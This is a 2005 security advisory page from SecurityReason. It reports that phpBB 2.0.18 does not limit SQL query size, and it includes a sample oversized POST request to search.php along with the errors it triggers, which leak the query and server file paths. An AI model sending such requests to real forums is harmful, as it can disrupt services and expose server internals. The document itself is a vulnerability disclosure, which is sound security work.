|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityReason Advisory | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
 Advisory Text : -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [phpBB 2.0.18 SQL Query problem cXIb8O3.19] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 11.11.2005 from securityreason.com TEAM - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar d package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL , MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so lution for all web sites. Contact with author http://www.phpbb.com/about.php. - --- 1. * SQL query problem --- phpBB2 don't check size of sql query. So we can send any data in all post variables. Standart Environment: post_max_size=8M (standart) max_allowed_packet < 7M (1M standart in mysql) Example Evironment: memory_limit>8MB max_execution_time=30 max_allowed_packet=1M I have written simple request where one variable POST to sql query was 1M. - ---request--- POST /2018/phpBB2/search.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: strlen(x) mode=results&search_keywords=SecurityReasonComSecurityRea...xMB>max_allowed _packet.(example.1MB.data)...sonCom - ---/request--- so in output: - ---output1--- Could not obtain matched posts list DEBUG MODE SQL Error : 1153 Got a packet bigger than 'max_allowed_packet' SELECT m.post_id FROM phpbb_search_wordlist w, phpbb_search_wordmatch m WHERE w.word_text LIKE 'securityreasoncomsecurityreasoncom...' AND m.word_id = w.word_id AND w.word_common <> 1 AND m.title_match = 0 Line : 321 File : search.php - ---/output1--- sql error. or when you have: memory_limit=8MB or max_execution_time<30 display_error=1 You can see in output example: - ---output2--- Fatal error: Maximum execution time of 15 seconds exceeded in /www/2018/phpBB2/includes/functions_search.php on line 72 - ---/output2--- - ---output3--- Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 1746401 bytes) in /www/2018/phpBB2/includes/functions_search.php on line 27 - ---/output3--- Exploit: http://securityreason.com/achievement_exploitalert/4 (simple errors) - --- 2. Greets --- sp3x - --- 3.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg securityreason.com TEAM -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDTTO43Ke13X/fTO4RAuUsAJ9Ry6GqbPsb1wSxvqU37cp87UHpTgCeIwdy k1NCDNaYsDg1ofLsZFJDMAw= =dp0t -----END PGP SIGNATURE----- |
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
(
- 2009-10-02